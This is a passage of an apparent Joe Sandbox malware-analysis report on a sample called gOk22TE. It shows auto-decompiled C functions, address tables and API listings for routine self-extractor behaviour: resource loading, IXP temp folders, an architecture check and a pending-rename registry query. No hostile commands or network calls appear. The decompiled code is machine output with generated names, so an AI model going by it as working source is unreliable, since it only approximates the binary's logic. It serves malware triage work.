							E010E44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x10e8a38 & 0x00000001) == 0 && ( *0x10e9a34 & 0x00000001) == 0) {
						SendMessageA( *0x10e8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                                0x010e4fe0
                                                                                                                                                                                                                                                0x010e4fe6
                                                                                                                                                                                                                                                0x010e4ff9
                                                                                                                                                                                                                                                0x010e500d
                                                                                                                                                                                                                                                0x010e5013
                                                                                                                                                                                                                                                0x010e501a
                                                                                                                                                                                                                                                0x010e5163
                                                                                                                                                                                                                                                0x010e5163
                                                                                                                                                                                                                                                0x010e5020
                                                                                                                                                                                                                                                0x010e5027
                                                                                                                                                                                                                                                0x010e5037
                                                                                                                                                                                                                                                0x010e5051
                                                                                                                                                                                                                                                0x010e5051
                                                                                                                                                                                                                                                0x010e5057
                                                                                                                                                                                                                                                0x010e505e
                                                                                                                                                                                                                                                0x010e50a7
                                                                                                                                                                                                                                                0x010e50ad
                                                                                                                                                                                                                                                0x010e50b4
                                                                                                                                                                                                                                                0x010e50e8
                                                                                                                                                                                                                                                0x010e50e8
                                                                                                                                                                                                                                                0x010e50ee
                                                                                                                                                                                                                                                0x010e50ff
                                                                                                                                                                                                                                                0x010e5104
                                                                                                                                                                                                                                                0x010e5106
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5106
                                                                                                                                                                                                                                                0x010e50cd
                                                                                                                                                                                                                                                0x010e50d3
                                                                                                                                                                                                                                                0x010e50da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e50dd
                                                                                                                                                                                                                                                0x010e50e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5060
                                                                                                                                                                                                                                                0x010e5060
                                                                                                                                                                                                                                                0x010e5070
                                                                                                                                                                                                                                                0x010e5075
                                                                                                                                                                                                                                                0x010e5107
                                                                                                                                                                                                                                                0x010e5107
                                                                                                                                                                                                                                                0x010e510e
                                                                                                                                                                                                                                                0x010e5111
                                                                                                                                                                                                                                                0x010e5117
                                                                                                                                                                                                                                                0x010e5117
                                                                                                                                                                                                                                                0x010e511f
                                                                                                                                                                                                                                                0x010e5121
                                                                                                                                                                                                                                                0x010e5127
                                                                                                                                                                                                                                                0x010e5135
                                                                                                                                                                                                                                                0x010e5135
                                                                                                                                                                                                                                                0x010e5127
                                                                                                                                                                                                                                                0x010e5141
                                                                                                                                                                                                                                                0x010e5159
                                                                                                                                                                                                                                                0x010e5159
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e515f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010E4FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 010E5006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 010E500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 010E5030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 010E5037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 010E504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 010E5051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010E5111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010E5159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                                                                                                                                                                                                                                                • Instruction ID: b10cefb49644ed1464e62d32c7085b0d69ad4a2bf1db456079051dc8e20a4939
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3031E6B5740301AFE7305A67AD8DF663ADCA708F59F0444ADB9C1EE149DA7ECC008760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E010E53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x10e8004; // 0x71a8563c
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E010E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E010E1680(_t32, 0x104, _t20);
					E010E658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E010E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x10e8a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                                0x010e53ac
                                                                                                                                                                                                                                                0x010e53b3
                                                                                                                                                                                                                                                0x010e53b9
                                                                                                                                                                                                                                                0x010e53bb
                                                                                                                                                                                                                                                0x010e53bd
                                                                                                                                                                                                                                                0x010e53bf
                                                                                                                                                                                                                                                0x010e53d1
                                                                                                                                                                                                                                                0x010e53d6
                                                                                                                                                                                                                                                0x010e53e0
                                                                                                                                                                                                                                                0x010e53e2
                                                                                                                                                                                                                                                0x010e53f5
                                                                                                                                                                                                                                                0x010e53fb
                                                                                                                                                                                                                                                0x010e5402
                                                                                                                                                                                                                                                0x010e540b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5413
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5415
                                                                                                                                                                                                                                                0x010e5416
                                                                                                                                                                                                                                                0x010e5427
                                                                                                                                                                                                                                                0x010e542a
                                                                                                                                                                                                                                                0x010e542b
                                                                                                                                                                                                                                                0x010e5434
                                                                                                                                                                                                                                                0x010e5434
                                                                                                                                                                                                                                                0x010e543a
                                                                                                                                                                                                                                                0x010e544c
                                                                                                                                                                                                                                                0x010e544c
                                                                                                                                                                                                                                                0x010e5452
                                                                                                                                                                                                                                                0x010e545a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e545e
                                                                                                                                                                                                                                                0x010e545f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E53FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-3746127100
                                                                                                                                                                                                                                                • Opcode ID: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                                                                                                                                                                                                                                                • Instruction ID: 6a0d9dcecac6b2ca5434bdcc4a162de7b2fdb8969ef20146aeea750450ce180b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F11E671700104ABE7209A379C4CFEF3AEDEBD5B25F004465B6C697180CE7989428760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 478 10e5467-10e5484 479 10e551c-10e5528 call 10e1680 478->479 480 10e548a-10e5490 call 10e53a1 478->480 484 10e552d-10e5539 call 10e58c8 479->484 483 10e5495-10e5497 480->483 485 10e549d-10e54c0 call 10e1781 483->485 486 10e5581-10e5583 483->486 493 10e554d-10e5552 484->493 494 10e553b-10e5545 CreateDirectoryA 484->494 499 10e550c-10e551a call 10e658a 485->499 500 10e54c2-10e54d8 GetSystemInfo 485->500 489 10e558d-10e559d call 10e6ce0 486->489 497 10e5554-10e5557 call 10e597d 493->497 498 10e5585-10e558b 493->498 495 10e5577-10e557c call 10e6285 494->495 496 10e5547 494->496 495->486 496->493 507 10e555c-10e555e 497->507 498->489 499->484 505 10e54fe 500->505 506 10e54da-10e54dd 500->506 508 10e5503-10e5507 call 10e658a 505->508 511 10e54df-10e54e2 506->511 512 10e54f7-10e54fc 506->512 507->498 515 10e5560-10e5566 507->515 508->499 513 10e54e4-10e54e7 511->513 514 10e54f0-10e54f5 511->514 512->508 513->499 517 10e54e9-10e54ee 513->517 514->508 515->486 518 10e5568-10e5575 RemoveDirectoryA 515->518 517->508 518->486
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E010E5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x10e8004; // 0x71a8563c
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x10e91e4;
					_t42 = 0x104;
					E010E1680(0x10e91e4, 0x104);
					L14:
					_t13 = E010E58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x10e9124 = 0;
							_t14 = 1;
							L24:
							return E010E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E010E597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x10e8a20; // 0x0
						if(_t61 != 0) {
							 *0x10e8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x10e9124 = E010E6285();
						goto L22;
					}
					 *0x10e8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E010E53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x10e91e4;
				E010E1781(0x10e91e4, 0x104, __ecx,  &_v268);
				if(( *0x10e9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E010E658A(_t48, 0x104, 0x10e1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E010E658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                                0x010e5472
                                                                                                                                                                                                                                                0x010e5479
                                                                                                                                                                                                                                                0x010e5481
                                                                                                                                                                                                                                                0x010e5484
                                                                                                                                                                                                                                                0x010e551c
                                                                                                                                                                                                                                                0x010e5521
                                                                                                                                                                                                                                                0x010e5528
                                                                                                                                                                                                                                                0x010e552d
                                                                                                                                                                                                                                                0x010e552f
                                                                                                                                                                                                                                                0x010e5539
                                                                                                                                                                                                                                                0x010e554d
                                                                                                                                                                                                                                                0x010e554d
                                                                                                                                                                                                                                                0x010e5552
                                                                                                                                                                                                                                                0x010e5585
                                                                                                                                                                                                                                                0x010e5585
                                                                                                                                                                                                                                                0x010e558b
                                                                                                                                                                                                                                                0x010e558d
                                                                                                                                                                                                                                                0x010e559d
                                                                                                                                                                                                                                                0x010e559d
                                                                                                                                                                                                                                                0x010e5557
                                                                                                                                                                                                                                                0x010e555e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5560
                                                                                                                                                                                                                                                0x010e5566
                                                                                                                                                                                                                                                0x010e5569
                                                                                                                                                                                                                                                0x010e556f
                                                                                                                                                                                                                                                0x010e556f
                                                                                                                                                                                                                                                0x010e5581
                                                                                                                                                                                                                                                0x010e5581
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5581
                                                                                                                                                                                                                                                0x010e5545
                                                                                                                                                                                                                                                0x010e557c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e557c
                                                                                                                                                                                                                                                0x010e5547
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5547
                                                                                                                                                                                                                                                0x010e548a
                                                                                                                                                                                                                                                0x010e5490
                                                                                                                                                                                                                                                0x010e5497
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e549d
                                                                                                                                                                                                                                                0x010e54ab
                                                                                                                                                                                                                                                0x010e54b4
                                                                                                                                                                                                                                                0x010e54c0
                                                                                                                                                                                                                                                0x010e550c
                                                                                                                                                                                                                                                0x010e5511
                                                                                                                                                                                                                                                0x010e5515
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5515
                                                                                                                                                                                                                                                0x010e54c9
                                                                                                                                                                                                                                                0x010e54d6
                                                                                                                                                                                                                                                0x010e54d8
                                                                                                                                                                                                                                                0x010e54fe
                                                                                                                                                                                                                                                0x010e5503
                                                                                                                                                                                                                                                0x010e5507
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5507
                                                                                                                                                                                                                                                0x010e54da
                                                                                                                                                                                                                                                0x010e54dd
                                                                                                                                                                                                                                                0x010e54f7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e54f7
                                                                                                                                                                                                                                                0x010e54df
                                                                                                                                                                                                                                                0x010e54e2
                                                                                                                                                                                                                                                0x010e54f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e54f0
                                                                                                                                                                                                                                                0x010e54e7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e54e9
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E54C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E556F
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E53FB
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5402
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E541F
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E542B
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-4185119251
                                                                                                                                                                                                                                                • Opcode ID: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                                                                                                                                                                                                                                                • Instruction ID: 9b9a80047c23990354c4d8017fe03c868fc2a731c7b6f9888b3d664ad6fec8d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA313876B002019FDB249B3B9C1C5BE7BEAAB9570CF0448AEE5C2C7644DA75CA018B90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 519 10e256d-10e257d 520 10e2622-10e2627 call 10e24e0 519->520 521 10e2583-10e2589 519->521 528 10e2629-10e262f 520->528 523 10e258b 521->523 524 10e25e8-10e2607 RegOpenKeyExA 521->524 523->528 529 10e2591-10e2595 523->529 525 10e2609-10e2620 RegQueryInfoKeyA 524->525 526 10e25e3-10e25e6 524->526 530 10e25d1-10e25dd RegCloseKey 525->530 526->528 529->528 531 10e259b-10e25ba RegOpenKeyExA 529->531 530->526 531->526 532 10e25bc-10e25cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E010E256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E010E24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                                0x010e2572
                                                                                                                                                                                                                                                0x010e2573
                                                                                                                                                                                                                                                0x010e2575
                                                                                                                                                                                                                                                0x010e2578
                                                                                                                                                                                                                                                0x010e257d
                                                                                                                                                                                                                                                0x010e2627
                                                                                                                                                                                                                                                0x010e2583
                                                                                                                                                                                                                                                0x010e2586
                                                                                                                                                                                                                                                0x010e2589
                                                                                                                                                                                                                                                0x010e25eb
                                                                                                                                                                                                                                                0x010e2607
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2609
                                                                                                                                                                                                                                                0x010e261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e258b
                                                                                                                                                                                                                                                0x010e258b
                                                                                                                                                                                                                                                0x010e259e
                                                                                                                                                                                                                                                0x010e25b2
                                                                                                                                                                                                                                                0x010e25ba
                                                                                                                                                                                                                                                0x010e25cb
                                                                                                                                                                                                                                                0x010e25d1
                                                                                                                                                                                                                                                0x010e25d6
                                                                                                                                                                                                                                                0x010e25da
                                                                                                                                                                                                                                                0x010e25dd
                                                                                                                                                                                                                                                0x010e25dd
                                                                                                                                                                                                                                                0x010e25e3
                                                                                                                                                                                                                                                0x010e25e3
                                                                                                                                                                                                                                                0x010e25e3
                                                                                                                                                                                                                                                0x010e258b
                                                                                                                                                                                                                                                0x010e2589
                                                                                                                                                                                                                                                0x010e262f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010E4096,00000000,00000000,00000000,00000000,?,010E1ED3,00000001,00000000), ref: 010E261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010E25F5
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 010E25C3
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 010E25A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
